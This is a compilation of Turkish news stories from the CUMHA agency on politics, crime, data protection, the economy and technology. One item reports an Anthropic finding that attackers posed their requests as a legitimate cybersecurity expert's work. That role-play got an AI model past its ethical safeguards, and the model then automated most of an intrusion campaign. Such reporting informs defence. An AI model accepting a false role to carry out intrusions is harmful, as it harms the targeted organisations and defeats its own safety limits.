Edge ve Vivaldi gibi tarayıcılarda uzun süredir bulunan bölünmüş sekme özelliği, Chrome’a geç de olsa entegre edilmiş oldu. Böylece Chrome kullanıcıları, üçüncü parti eklentilere veya işletim sistemi tabanlı pencere bölme çözümlerine ihtiyaç duymadan bu işlevi doğrudan tarayıcı içinde kullanabiliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

“Herkesin Kendini Eşit ve Özgür Hissettiği Bir Toplum Mümkün”
Bakan Fidan, Suriye’nin geleceğine ilişkin, “Ne federalizm getiriyoruz diye ülkeyi böleceksiniz, ne bütünlük getiriyoruz diye insanları ezeceksiniz. Herkesin kendini eşit özgür hissettiği bir toplum kurmak mümkün.” ifadelerini kullandı. Fidan, birleşik ve bütünleşik bir Suriye’nin Türkiye için önemini vurguladı.

8 Aralık Değerlendirmesi
Konuşmasında Suriye’de 8 Aralık tarihine özel bir yer ayıran Fidan, “8 Aralık tarihi bir gün. Aslında içerde çürümüş olan rejimin kendisini resmi olarak ölü ilan ettiği bir gün.” sözleriyle bu dönüm noktasının Suriye halkı için umut taşıdığını söyledi. Fidan, buna rağmen sorunların ortadan kalkmadığını belirterek, “Yeni bir sorunlar yumağının içinde bulduk kendimizi.” ifadesini kullandı.

Arap Ülkeleriyle İstişare Süreci
Bölge ülkelerinin ve Avrupa’nın 8 Aralık sonrası ne yapılacağı konusunda kararsız kaldığını dile getiren Fidan, Arap ülkelerinin farklı tepkiler göstermesini beklediğini ifade etti. Filistin konusunda oluşturulan temas grubunun güçlendirdiği güven ortamına değinen Fidan, “Lütfen hemen bir tepki koymayın. Bir araya gelelim; bu yeni yönetimden ne isteyeceğimize karar verelim.” diyerek ilk hafta içinde Kahire’de gerçekleştirilen dar kapsamlı toplantıyı anlattı.

Kuzeydoğunun Entegrasyonu ve Bölgesel Riskler
Suriye’nin kuzeydoğusuna ilişkin sürecin sulh yoluyla ilerlemesi gerektiğini belirten Fidan, “Bu sürecin ilerletilmesi, sulh ile çözülmesi, yeni bir çatışmanın olmaması gerektiğini herkese söylüyoruz.” dedi. Bölgedeki en büyük sorunlardan birinin İsrail’in Suriye’yi bir yayılma alanı olarak görmesi olduğunu ifade eden Fidan, bölgesel istikrarın ancak kapsamlı ve ortak bir yaklaşım ile sağlanabileceğini kaydetti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Yanlış Yansıtılan Haber İddialarına Tepki
Bazı yayın organlarında, saldırının V.A. ile Yusuf Emir Güner arasında “gönül ilişkisi kaynaklı tartışma” nedeniyle çıktığı ve arbedenin ardından ateş edildiği öne sürülmüştü. Aile ve tanıklar, bu anlatımın hiçbir şekilde gerçeği karşılamadığını belirterek olayın planlı bir nitelik taşıdığına işaret etti.

Ağabey Yasin Güner: “Ofiste çalışıyorlardı, silahla geri döndü”
Ağabey Yasin Güner, kardeşinin olay günü boya ve alçı işine gittiğini, ofiste çalışanlarla birlikte tadilat yaptığını aktardı. Güner, kardeşinin kız arkadaşı Sena A.’nın babası Hasan A.’nın da tadilata katıldığını belirtti.

Güner, olayın seyrini şu sözlerle anlattı:
“V.A. ofise geldi, yapılan işi beğendiğini söyledi. Ardından ‘amcamın yanına gidiyorum’ diyerek dışarı çıktı. Kısa süre sonra elinde silahla geri döndü. Silahı Yusuf Emir’in kafasına dayadı. Kardeşim silahın yönünü eliyle çevirmek isterken ilk mermi ateş aldı. Kaçmaya çalışırken ikinci mermi vücuduna isabet etti. Yusuf Emir kendisini dışarı atarken Hasan A. elindeki demir çubukla V.A.’ya vurdu.”

Güner, “Olayın tüm görüntüleri elimizde, yasal mercilere teslim ettik.” diyerek soruşturmanın netleşeceğine inandıklarını ifade etti.

Tanık Furkan Özçelik: “Güle eğlene çalışıyorduk, sonra silahını alıp geldi”
Olayın birebir tanığı Furkan Özçelik, saldırının ani bir tartışmanın parçası olmadığını belirtti. Özçelik, “Güle eğlene çalışıyorduk. V.A. geldi, hal hatır sordu, ‘Güzel olmuş’ dedi. Oradan çıktığında herhalde silahını almaya gitti; sonra dönüp üzerimize ateş etti.” sözleriyle yaşananları anlattı.

Özçelik, saldırı sırasında Yusuf Emir Güner’in korunmak için kaçtığını, V.A.’nın arkasından koştuğunu belirtti ve V.A.’nın eve geldiğinde alkol etkisinde olduğuna dikkat çekti. “Adaletin yerini bulacağına inanıyorum.” dedi.

Soruşturma Çok Yönlü Devam Ediyor
Yusuf Emir Güner kaldırıldığı hastanede yapılan tüm müdahalelere rağmen hayatını kaybetti. Aile tarafından sunulan görüntüler ve tanık ifadeleri doğrultusunda soruşturmanın geniş kapsamlı şekilde sürdüğü, adli makamların tüm delilleri incelemeye aldığı öğrenildi. Aile bireyleri, “Adaletin yerini bulacağına inanıyoruz.” ifadesini paylaştı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Yoğun Şikâyet Üzerine İnceleme Başlatıldı
Kararda, konaklama tesislerinde misafirlerden kimlik fotokopisi alınması ve bu fotokopilerin sistemlerde saklanmasına yönelik çok sayıda şikâyet ve ihbar yapıldığı hatırlatıldı. Kişisel Verileri Koruma Kurulu, söz konusu başvurular üzerine turizm ve otelcilik sektörünün mevzuat çerçevesindeki yükümlülüklerini ve fiili uygulamaları birlikte ele aldı.

KVKK’nın Temel İlkeleri Hatırlatıldı
Kurul, 6698 sayılı Kişisel Verilerin Korunması Kanunu’nun 4’üncü maddesinde sayılan “hukuka ve dürüstlük kurallarına uygun olma” ile “işlendikleri amaçla bağlantılı, sınırlı ve ölçülü olma” ilkelerini vurguladı. Kararda, kişisel verilerin ancak belirli, açık ve meşru amaçlar için işlenebileceği, ihtiyaç fazlası veri toplanamayacağı ve daha sonra bu amaçla bağdaşmayan şekilde kullanılamayacağı kaydedildi.

Açık Rıza Şartı ve Diğer Hukuki Sebepler Değerlendirildi
KVKK’nın 5’inci maddesinde yer alan kişisel veri işleme şartlarının tek tek değerlendirildiği kararda, kanunlarda açıkça öngörülmesi, fiili imkânsızlık, veri sorumlusunun hukuki yükümlülüğünü yerine getirmesi, bir hakkın tesisi, kullanılması veya korunması gibi hukuki sebepler hatırlatıldı. Kurul, konaklama işletmelerinin kimlik bildirme ve vergi mevzuatından kaynaklanan yükümlülüklerini yerine getirirken bu sınırlar içinde hareket etmesi gerektiğini belirtti.

Kimlik Bildirme Kanunu’na Atıf Yapıldı
Kararda, konaklama hizmeti veren yerler bakımından 1774 sayılı Kimlik Bildirme Kanunu ve ilgili Yönetmelik hükümleri ayrıntılı şekilde incelendi. Bu kapsamda, otel, motel, pansiyon ve benzeri yerlerin, misafirlerine ilişkin olarak ad, soyad, T.C. kimlik numarası ve diğer kimlik bilgilerini günlük müşteri listelerinde kayıt altına almakla yükümlü olduğu, ancak kanun ve yönetmeliklerde kimlik belgesinin fotokopisinin alınmasına yönelik açık bir zorunluluk bulunmadığı değerlendirildi.

Vergi Usul Kanunu Çerçevesinde Tesis Belgeleri
Ayrıca 213 sayılı Vergi Usul Kanunu’nun “Taşıma ve otel işletmelerine ait belgeler” başlıklı 240’ıncı maddesi kapsamında günlük müşteri listelerinde yer alması gereken bilgiler hatırlatıldı. Kararda, bu listelerde mükellefin adı, soyadı, varsa unvanı ve adresi, oda numarası, oda ücreti ve düzenlenme tarihinin bulunmasının yeterli olduğu; kimlik belgesinin tamamının fotokopiyle çoğaltılıp saklanmasının bu yükümlülüklerin yerine getirilmesi için zorunlu olmadığı vurgulandı.

Kimlik Fotokopisinde Ölçülülük Sorunu
Kurul, kimlik belgesinin fotokopisinin alınması yoluyla, kimlik numarası, seri numarası, fotoğraf, aile bilgileri, imza ve benzeri pek çok verinin tek seferde kopyalandığına dikkat çekti. Kararda, bu yöntemin, konaklama hizmetinin sunulması için gerekli olandan çok daha fazla kişisel verinin işlenmesine yol açtığı ve ölçülülük ilkesine aykırılık riski taşıdığı ifade edildi.

Turizm Tesislerine Uygulamayı Gözden Geçirme Çağrısı
İlke kararında, turizm ve otelcilik sektöründe faaliyet gösteren veri sorumlusu işletmelerin, kimlik fotokopisi alınmasına yönelik süreçlerini gözden geçirmesi istendi. Kurul, konaklama tesislerinin yalnızca mevzuatın açıkça zorunlu kıldığı kişisel verileri işlemesi, kimlik belgesinin fotokopisinin alınmasını gerektiren açık bir hüküm bulunmadıkça bu uygulamadan kaçınması gerektiğini belirtti.

Mevcut Kayıtlar İçin KVKK’ya Uygun İşlem Vurgusu
Kararda, hâlihazırda sistemlerinde kimlik belgesi fotokopisi bulunan konaklama işletmelerinin, bu verileri KVKK’nın 7’nci maddesinde yer alan “işleme şartlarının ortadan kalkması hâlinde silme, yok etme veya anonim hâle getirme” yükümlülüklerine uygun şekilde değerlendirmesi gerektiği kaydedildi. İşletmelerin, çalışanlarını da kişisel verilerin korunması konusunda bilgilendirmesi ve gerekli teknik ve idari tedbirleri almaya devam etmesi gerektiği ifade edildi.

Yeni Dönem: Sınırlı Veri, Şeffaf Aydınlatma
Kurul, turizm ve otelcilik sektöründe faaliyet gösteren tüm veri sorumlularını, konaklama hizmeti sırasında yalnızca zorunlu bilgileri kaydetmeye, misafirleri açık ve anlaşılır biçimde aydınlatmaya ve kimlik fotokopisi alma alışkanlığını gözden geçirmeye davet etti. İlke kararının, hem konaklama tesisleri için rehber niteliğinde olduğu hem de kişisel verilerin korunması konusunda sektörel farkındalığı artırmasının hedeflendiği belirtildi.

Resmi Gazete Linki

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kullanıcılar Yanıt Bekliyor
Erişimin kesilmesiyle birlikte platformda işlem yapan binlerce kullanıcı, taleplerin ve açık işlerin durumuna ilişkin belirsizlik yaşamaya başladı. Sosyal medya paylaşımlarında “Armut com kapandı mı” ve “neden açılmıyor” soruları öne çıktı.

Şirket: Gerekçeye Ulaşamadık
Armut com, yaptığı açıklamada kararın kendilerine resmî olarak tebliğ edilmediğini belirtti. Açıklamada, “Erişim engelinin mesai saatleri dışında uygulanması nedeniyle karar metnine ve gerekçeye şu aşamada ulaşamadığımızı öğrenmiş bulunuyoruz.” denildi.

Hukuki Süreç Başlatılıyor
Şirket avukatlarının mahkeme dosyasına erişmek için adliyeye gideceği ve engelin haksız olduğunu düşündükleri için gerekli başvuruları yapacakları kaydedildi. Kararın ayrıntıları netleştiğinde hem hizmet verenlerin hem de kullanıcıların bilgilendirileceği ifade edildi.

Erişim engelinin ne zaman kaldırılacağına dair herhangi bir resmî açıklama yapılmazken, kullanıcılar gelişmeleri yakından takip ediyor.

Kamuoyunun bilgisine sunarız. pic.twitter.com/UyHLkd6ryY

— armut (@armutcom) December 8, 2025

Kaynak: CUMHA - CUMHUR HABER AJANSI

İnsan Katkısı Yüzde 10 Seviyesine Geriledi
Rapora göre model, büyük teknoloji şirketlerinden finans kuruluşlarına ve kimyasal üretim tesislerine kadar geniş bir yelpazedeki hedeflere yönelik operasyonlarda taktiksel süreçlerin yüzde 80 ila 90’ını otomatik olarak koordine etti. İnsan operatörler yalnızca hedef seçimi ve sızma öncesi kritik onay aşamasında devreye girdi.

Konya Bilişim Derneği Siber Güvenlik Birim Başkanı Mustafa Yılmaz, değerlendirmesinde, “Tarihteki ilk otonom, yapay zekâ, siber saldırısı resmen gerçekleşti.” dedi. Yılmaz, saldırının teknikten çok yöntemsel yenilik içerdiğini vurgulayarak yapay zekânın bir “operasyon komutanı” gibi çalıştığını kaydetti.

Etik Protokolleri Sosyal Mühendislikle Aştı
Raporun dikkat çeken bulgularından biri, saldırganların yapay zekânın güvenlik kısıtlarını teknik açıklarla değil sosyal mühendislik yöntemleriyle devre dışı bırakması oldu. Modele “meşru bir siber güvenlik uzmanı” rolü yükleyen tehdit aktörleri, etik denetimleri yanıltarak zafiyet tespiti ve sızma aşamalarının otomasyonunu sağladı.

Anthropic uzmanları, modelin bu rolü gerçek bir görev gibi benimseyerek hedef sistemlerde kritik adımları kendi başına yürüttüğünü belirtti. Bu durum, yapay zekâ modellerinin manipülasyona açık olduğu yönündeki endişeleri güçlendirdi.

Saldırganların Gücü Yeni Kodda Değil, YZ Koordinasyonunda
Raporda saldırganların yeni zararlı yazılımlar üretmek yerine açık kaynaklı ve yaygın sızma testi araçlarını tercih ettiği bildirildi. Mustafa Yılmaz, “Saldırıyı tehlikeli kılan şey yeni bir silah değil, tüm araçları yöneten bir Yapay Zekâ Komutan kurgusudur.” diyerek kritik dönüşümü tanımladı.

Bu yaklaşım, devlet düzeyindeki siber yeteneklerin artık küçük gruplar tarafından da erişilebilir hale geldiğini gösterdi. Yılmaz, gelişmenin küresel tehdit dengelerini kalıcı biçimde değiştirebileceğini ifade etti.

Savunmada Yapay Zekâ Zorunluluğu
Anthropic güvenlik ekibi, saldırının analizinde yine Claude modelinden yararlandığını açıkladı. Raporun sonuç bölümünde yer verilen, “Ya adapte olursunuz ya da yok olursunuz.” ifadesi, siber savunma ekiplerinin yapay zekâ destekli tehdit tespit ve müdahale araçlarını hızla entegre etmek zorunda olduğu mesajını öne çıkardı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Düşen üretim ve artan kayıplar
Gürer, bakliyat ve tahılda 2002’nin dahi altına inen üretim seviyelerine dikkat çekti. Bitkisel üretimde 2023’e göre 10 milyon tonluk kayıp yaşandığını ifade eden Gürer, “Olmayan ürünün fiyatı düşmez; artar. Rafta ürün yoksa fiyatın düşmesi ancak hesaplamadan çıkarılmasıyla olur.” dedi.

Hamsi fiyatlarında dalgalanma
Gürer, bazı temel ürünlerdeki ani fiyat değişimlerinin TÜİK hesaplamalarına yansımadığını belirterek “Hamsi bir hafta 70, ertesi hafta 140 TL. Tesadüf bu ya, TÜİK’in hesap yaptığı hafta hamsinin fiyatı düşük. Ertesi hafta tekrar artıyor.” ifadelerini kullandı. Peynir ve et gibi temel gıda maddelerinin sepet içinde yeterince temsil edilmediğini söyleyen Gürer, açıklanan verilerin dar gelirli için gerçeği yansıtmadığını kaydetti.

Gelir-grupları üzerindeki etkiler
Gürer, Türk-İş’in yoksulluk sınırını 97 bin TL, açlık sınırını 28 bin TL olarak açıkladığını hatırlattı. Emekli ve asgari ücretli için geçim şartlarının ağırlaştığını belirten Gürer, “Emeklinin aldığı maaşla geçinmek olası değil. Asgari ücret özel sektörde taban ücret haline geldi.” dedi. CHP Genel Başkanı Özgür Özel’in açıkladığı asgari ücret önerisini hatırlatarak en az 39 bin TL olması gerektiğini ifade etti.

İthalatın etkileri ve kazanan-kaybeden dengesi
Gürer, ithalatın artmasıyla yerli üreticinin zarar gördüğünü söyledi. “Bir mutlu azınlık gıdadan büyük para kazanıyor. Üretici kaybediyor, besici kaybediyor, vatandaş kaybediyor.” diyen Gürer, zirai don ve kuraklıkla oluşan kayıplara rağmen üreticiye yeterli desteğin verilmediğini belirtti.

Ekonomik politikalar ve veri tartışması
Gürer, sıkı para politikasının halk üzerindeki yükünü vurgulayarak “Üretim maliyetleri düşürülmeli, desteklemeler artırılmalı, aracılık sistemi daraltılmalı, ithalata bağımlılık azaltılmalı, gerçekçi ve bağımsız veri açıklanmalı.” dedi. Enflasyon verileri üzerindeki tartışmalara değinen Gürer, “Enflasyon düşmüyor. Sokakta, pazarda, mutfakta herkes gerçek fiyatı görüyor. Üretim düşmüşken fiyat nasıl düşüyor? Bu bir mucize değil; düpedüz ayarlama.” şeklinde konuştu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Gürer, madde bağımlılığı ile mücadelede bütüncül bir yaklaşımın önemine vurgu yaparak “Gençleri ağına düşüren madde bağımlılığı ile kapsamlı mücadelenin şart olduğunu” ifade etti. Sürecin topyekûn bir mücadele gerektirdiğini dile getiren Gürer, tedavi imkanlarının da güçlendirilmesi gerektiğini kaydetti.

Milletvekili Gürer, Sağlık Bakanı Prof. Dr. Kemal Memişoğlu’na bağımlılıkla mücadelede mevcut merkezlerin sayısı, tedavi kapasitesi ve önleme çalışmalarının kapsamına ilişkin sorular yöneltti. Gürer, “Kaç ilde madde bağımlılığıyla mücadele merkezi vardır? Sigara kadar madde bağımlılığı için de neden mücadele edilmemektedir? Tedavi merkezleri sayısı sizce yeterli midir?” diyerek mevcut yapının değerlendirilmesini istedi.

Bakan Memişoğlu, bağımlılıkla mücadelenin Cumhurbaşkanı Yardımcısı başkanlığındaki Bağımlılık ile Mücadele Yüksek Kurulu koordinasyonunda yürütüldüğünü açıkladı. Memişoğlu, “81 ilimizin tamamında bağımlılığa yönelik danışmanlık ve tedavi hizmeti verilmekte; ülke genelinde bağımlılık alanında özelleşmiş 144 arındırma merkezinde 1.582 yatak kapasitesi mevcuttur.” dedi.

Bakan Memişoğlu ayrıca, “Tedavi sonrası BAHAR rehabilitasyon modeli uygulanmakta olup Bakanlığımız bünyesinde 17, Yeşilay bünyesinde 3 rehabilitasyon merkezi bulunmaktadır. 2014’ten bu yana merkez sayısında %380, yatak kapasitesinde %122 artış sağlanmıştır.” ifadelerini kullandı. Memişoğlu, 81 ilde 327 Sağlıklı Hayat Merkezi ve 107 Yeşilay Danışmanlık Merkezinde yüz yüze destek sağlandığını, ALO 191 hattının da hizmet verdiğini belirtti.

Gürer, Bakanlığın verilerine dikkat çekerek merkez sayısındaki artışın sorunun büyüklüğüne de işaret ettiğini ifade etti. Gürer, “Emniyet ve Yeşilay’ın çalışmaları sürüyor ancak görünen o ki bu yeterli olmamaktadır.” dedi. Ailelerden okullara kadar tüm kurumların sürece dahil edilmesi gerektiğini vurgulayan Gürer, “Ülke genelinde artan madde bağımlılığını önlemek kadar kullananların tedavi edilerek kurtarılması önemlidir. Tedavi merkezleri artırılmalı ve toplum bilinçlendirilmelidir.” diye konuştu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kargo Takip Sistemleri Yeniden Erişime Açıldı
Şirket, kargo takip ekranlarının 1 Aralık 2025 saat 17.30 itibarıyla kullanılabilir hâle geldiğini bildirdi. Açıklamada, “Bu kapsamda kargo takip ekranlarımızdaki veriler en kısa sürede güncellenecektir.” ifadeleri yer aldı.

Geçici Yavaşlama ve Kesintiler Uyarısı
Aras Kargo, iyileştirme sürecinin devam ettiği dönemde anlık sistem yavaşlamaları ve erişim kesintilerinin görülebileceğini belirterek, ekiplerin 7/24 çalışma yürüttüğünü aktardı. Yapılan açıklamada, “Tüm hizmetlerimizi en hızlı ve güvenli şekilde eski hâline getirebilmek için ekiplerimiz aralıksız çalışmaktadır.” denildi.

Dağıtım ve Şube İşlemleri Yeniden Başladı
Dağıtım operasyonlarının yeniden devreye alındığını duyuran şirket, veri akışında yaşanabilecek geçici kesintilerin teslimat sürelerine etkileyebileceğini ifade etti. Şube hizmetlerine ilişkin olarak ise, “Şubelerimizde kargo kabul ve teslim işlemleri yeniden başlamıştır.” bilgisi paylaşıldı.

Tam Normalleşme İçin Çalışmalar Sürüyor
Aras Kargo, tüm sistemlerin tam kapasite çalışır hâle gelmesi için teknik ekiplerin iyileştirme çalışmalarını sürdürdüğünü belirtti. Şirket, müşterilere yönelik teşekkür mesajında “Anlayışınız ve güveniniz için içtenlikle teşekkür ederiz.” ifadelerine yer verdi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Daniel, 3 Eylül 2025 tarihinde RedHatPentester tarafından gönderilen bir WhatsApp mesajını örnek olarak seçtiğini ve mesajın normal görünmesine rağmen cihazın mesajın gönderildiği ana ait hassas konum verisini kaydettiğini ifade etti. Araştırmacı, “Gönderen konumunu paylaşmadı, ben talep etmedim, ancak telefon bunu otomatik olarak kaydetmiş.” dedi.

Medya Dosyalarının Tümünde Konum Kaydı
İncelemede, cihazda oluşturulan her fotoğraf, video, ekran görüntüsü ve ses kaydının çekildiği veya oluşturulduğu ana ait GPS koordinatlarını içerdiği ortaya çıktı. Daniel, bu verilerin hareket analizlerinde zaman çizelgesinin ayrıntılı biçimde çıkarılmasına imkân verdiğini kaydetti.

Senkronize Hesaplar ve Parolalara Erişim
Adli incelemede en dikkat çeken bulgulardan biri, cihaz üzerinde senkronize tüm kullanıcı hesaplarına ait URL, kullanıcı adı ve parola bilgilerinin kurtarılabilmesi oldu. Daniel, bu bilgilerin jailbreak yapılmamış bir cihazdan elde edildiğini vurgulayarak, “Bütün senkronize parolalar eksiksiz şekilde çıkarıldı.” ifadelerini kullandı.

Uygulama Kayıtları ve WhatsApp Grup Geçmişleri
Araştırmada cihazda bulunan tüm uygulamalara ait kullanım geçmişleri, dahili kayıtlar ve metadata bilgileri de elde edildi. WhatsApp özelinde ise kullanıcının katıldığı tüm grupların geçmişi, grupların oluşturulma tarihleri, kurucu bilgileri ve katılım zamanları kurtarıldı.

Daniel, “Cihaz, bir gruptan yıllar önce çıkılmış olsa bile oluşturulma tarihi ve katılım bilgilerini kayıtlı tutuyor.” dedi.

Mesaj Bazlı Konum Kaydı
İncelemede, WhatsApp mesajlarının gönderildiği anda cihaz tarafından kaydedilen konum bilgilerinin mesaj bazında dahi erişilebilir olması, uzmanlara göre adli incelemelerde kritik bir veri kaynağı niteliği taşıyor. Daniel, birçok kullanıcının bu kayıtların tutulduğundan habersiz olduğunu belirtti.

Daniel, yaptığı değerlendirmede “Her cihaz bir hikâye anlatıyor; mesajlar sadece yazıdan ibaret değil.” ifadelerini kullanarak dijital aygıtların gizli veri saklama kapasitesinin çoğu kullanıcı tarafından fark edilmediğinin altını çizdi.

Imagine receiving a normal WhatsApp message from someone… and later discovering that the message secretly contained their exact location, even though they never shared it.

That’s exactly what happened during a recent forensic extraction I performed on my iPhone 12 Pro Max.… pic.twitter.com/SQu6sgOu0h

— Elorm Daniel (@elormkdaniel) November 25, 2025

Kaynak: CUMHA - CUMHUR HABER AJANSI

Askeri Uçak Kazasında Şehit Olan 20 Personeli Andı

Bahçeli, Türk Silahlı Kuvvetleri envanterindeki C-130 tipi askeri kargo uçağının, 11 Kasım 2025’te Azerbaycan’ın Gence şehrinden Türkiye’ye dönüşü sırasında Gürcistan hava sahasında düşmesi sonucu şehit olan 20 personelin isimlerini tek tek okuyarak rahmet diledi. Şehitlerin naaşlarının 17 ilde toprağa verildiğini hatırlatan Bahçeli, “Bu kahraman vatan evlatlarının şerefli isimleri milli gönüllere kazınmış, geride bıraktıkları aileleri hepimizin namusuna emanet edilmiştir.” dedi.

Uçağın nasıl ve neden düştüğüne ilişkin soru işaretlerinin giderilmesi gerektiğini belirten Bahçeli, kaza-kırım incelemesinin tüm ihtimaller dikkate alınarak yürütüleceğini ifade etti. Kara kutunun deşifre edilmesi ve kaza-kırım heyetinin raporunun sonuçlanmasının sabırla beklenmesi gerektiğini söyleyen Bahçeli, “Talep ve beklentimiz, esrar perdesinin tamamen aralanmasıdır.” vurgusunu yaptı.

“Dezenformasyon Kampanyası İyi Niyetten Mahrumdur”

Bahçeli, kazanın ardından özellikle sosyal medyada yayılan iddia ve yorumlara sert tepki gösterdi. Askeri kargo uçağının düşmesinden hemen sonra “fiili kaza-kırım heyeti gibi” yayın yapanların, resmi açıklamaları beklemeden sosyal medya üzerinden hüküm verdiklerini belirten Bahçeli, “Oturdukları yerden bilirkişilik taslayanların cehil cüretkârlıkları saklanamayacak düzeydedir.” ifadesini kullandı.

Kazayı “düştü mü, düşürüldü mü” tartışmasına malzeme ederek komplo teorileri üreten çevrelere tepki gösteren Bahçeli, “Devletimize güven ve itibar asıldır. Milletimize doğru ve isabetli bilgiler vermek, komplo teorilerine kapalı durmak ahlaki bir mükellefiyettir.” dedi.

“Terörsüz Türkiye” Hedefi Devlet Politikasıdır

Konuşmasının geniş bölümünü “Terörsüz Türkiye” başlığına ayıran Bahçeli, Türkiye’nin birbirine eklemlenen güçlü adımlarla yeni yüzyıla mühür vuracağını vurguladı. Terörsüz Türkiye hedefinin, son yüz yılın en önemli fırsatlarından biri olduğunu dile getiren MHP Genel Başkanı, “Bu hedef hem devlet politikasıdır hem de milletin sarsılamaz politik ve demokratik gayesidir.” ifadesini kullandı.

Terörün bitirilmesi sürecinde kara propaganda üretenleri eleştiren Bahçeli, “Terörü siyasi nema olarak kullanan fesat ve nifak yuvaları Allah’ın izniyle çöküp gidecektir.” dedi. “Terörsüz Türkiye, gülen çocukların, sevinen anaların, huzurlu gelinlerin remzidir.” diyen Bahçeli, geri dönüş imkânı kalmadığını, sürecin “son düzlüğe” girdiğini kaydetti.

İmralı Tartışmaları ve Çarpıcı “Giderim” Mesajı

Bahçeli, Milli Dayanışma, Kardeşlik ve Demokrasi Komisyonu’nun bugün 17’nci toplantısını yapacağını hatırlatarak, önümüzdeki süreçte hazırlanacak yasal ve demokratik çerçevenin yol haritası olacağını söyledi. Bu kapsamda İmralı’ya gidilmesine yönelik tartışmalara değinen Bahçeli, sürecin asıl muhataplarından biriyle doğrudan temas kurulmasının önemine işaret etti.

Bahçeli, “Şayet Meclis’te kurulan komisyon karar alamazsa, hiç kimse bu ziyarete yanaşmazsa açıkça söylüyorum; alırım yanıma üç arkadaşımı, kendi imkânlarımızla İmralı’ya gitmekten gocunmam.” dedi. Karanlıkta göz kırpmayacağını, söylemesi gerekeni muhatabının gözünün içine bakarak söyleyeceğini ifade eden Bahçeli, bu hedefte müzakere, mütareke, taviz ve teslimiyet iddialarını reddetti.

MHP Genel Başkanı, parti grubuna dönerek “İmralı’ya gitmeme izin veriyor musunuz?” diye sordu ve bunun “milletin özü ve kararı” olarak görülmesi gerektiğini dile getirdi.

İBB Yolsuzluk Davası ve “Canlı Yayın” Çağrısı

Bahçeli, İstanbul Büyükşehir Belediyesi’ni saran rüşvet ve yolsuzluk davasına ilişkin 3741 sayfalık iddianamenin mahkemeye sunulduğunu hatırlattı. Detaylara girmeyeceğini belirten Bahçeli, “Artık Türk adaleti karar ve hükmünü verecektir. Bundan kaçış yoktur.” dedi.

CHP yönetiminin iddianameyi karalamasının sonuç vermeyeceğini söyleyen Bahçeli, iki başlıkta net beklenti ortaya koydu: “Yargılama hızla tekemmül ettirilmeli, geciken adaletin adalet olmayacağı unutulmamalıdır. Ayrıca yargılama en başta TRT olmak üzere tüm televizyonlardan canlı yayınlanmalıdır, Türk milleti olan biten her şeyi görüp öğrenmelidir.” değerlendirmesinde bulundu.

“Cumhuriyet Halk Partisi Bedeli Mukabilince Satın Alınmıştır”

Bahçeli, iddianamedeki iddialar üzerinden CHP’ye sert eleştiriler yöneltti. Cumhuriyet Halk Partisi’nin, “eko-sistem” denilen, organize suç örgütü olduğu ileri sürülen mafyalaşmış bir yapı tarafından belediye kaynakları kullanılarak “bedeli mukabilince satın alındığını” öne sürdü. Bu süreçle Türkiye’nin de satın alınması amacıyla gayri meşru bir finans hattı oluşturulduğunu savunan Bahçeli, “Türk devletinin CHP kongreleri gibi satılık olmadığını çok şükür göstermişlerdir.” dedi.

Emeklilerin, çocukların, çiftçilerin ve çalışanların haklarının gasp edilerek siyaset operasyonuna alet edildiğini söyleyen Bahçeli, İBB’deki iddiaları “yüzyılın soygunu” olarak niteledi. “Emeklilerimizin parası CHP’nin para kulelerindedir. Milletimizin helal rızkı dolandırılmış, belediye kasası boşaltılmıştır.” ifadelerini kullandı.

Tarihsel Ekonomi Değerlendirmesi ve Duyun-ı Umumiye Hatırlatması

Bahçeli, konuşmasının ekonomi bölümünde tarihsel bir perspektif çizerek Osmanlı’dan Cumhuriyet’e uzanan dönemi hatırlattı. Dış borçlanmaya dayalı Tanzimat devletçiliğinin, Ermeni ve Rum Osmanlı vatandaşları arasında ilk sermaye birikimini oluşturduğunu, ancak geniş kitlelerin yoksulluk içinde kaldığını anlattı.

Ahmet Şerif Bey’in Anadolu izlenimlerine atıf yapan Bahçeli, Duyun-ı Umumiye döneminde imparatorluğun gelirlerinin dış borçlara aktarıldığını, ilk borcun 1854’te alındığını ve son taksidin 1954’te ödendiğini hatırlattı. “Çayımıza koyacak şekerimiz yoktu, ama Çanakkale’de destanlar yazdık.” diyen Bahçeli, yoksulluğa katlanılabileceğini, ancak esarete ve teslimiyete asla razı olunamayacağını vurguladı.

“Türkiye Ekonomisi Toparlanma Aşamasındadır”

Bahçeli, ekonomide yeni bir hikâyeye ve zihniyet devrimine ihtiyaç olduğunu dile getirerek, ekonominin yalnızca rakam ve grafiklerden ibaret görülmemesi gerektiğini söyledi. Merhum Prof. Dr. Mehmet Eröz’ün sosyoloji ve ekonomi ilişkisine dair görüşlerini hatırlatan Bahçeli, insanı, ahlakı ve adaleti dışlayan bir ekonomik düzenin sürdürülemez olduğunu belirtti.

Dünya genelinde açlık ve yoksullukla obezitenin yan yana var olmasının “korkunç bir çelişki” olduğunu söyleyen Bahçeli, yolsuzluk bataklığının kurutulmasının zorunlu olduğunu vurguladı. İstanbul Büyükşehir Belediyesi’ni “örümcek ağı gibi saran rüşvet ve yolsuzluk damarının kesilip atılması” gerektiğini belirterek, “Türkiye ekonomisi toparlanma ve düze çıkma aşamasındadır. Enflasyon düşecek, hayat pahalılığı bitecek, kişi başına gelir insanca yaşamanın dayanağı olacaktır.” dedi.

“Örtünme, beslenme ve barınma sorunlarının” ortak vicdan seferberliğiyle çözülebileceğini kaydeden Bahçeli, herkesin ahlaki sorumlulukla elini taşın altına koyması gerektiğini ifade etti.

“Birliğimizi, Dirliğimizi Koruyacağız”

Bahçeli, konuşmasının sonunda birlik ve beraberlik mesajı verdi. Oğuz Kağan’ın “Birbirinizden ayrılırsanız hepinizi ok gibi birer birer kırıp parçalarlar.” sözünü hatırlatan Bahçeli, “Birliğimizi koruyacağız, dirliğimizi koruyacağız. Türkiye’nin ali ve asli çıkarlarından milim ödün vermeyeceğiz.” dedi.

MHP Genel Başkanı, “Önce ülkem ve milletim, sonra partim ve ben” anlayışını bir kez daha hatırlatarak, “Durmayacağız, sinmeyeceğiz, ürkmeyeceğiz; mevzu vatan ve millet olduğu sürece gözümüzü daldan budaktan uzak tutmayacağız.” ifadeleriyle konuşmasını tamamladı ve milletvekillerini saygıyla selamlayarak sözlerini noktaladı.

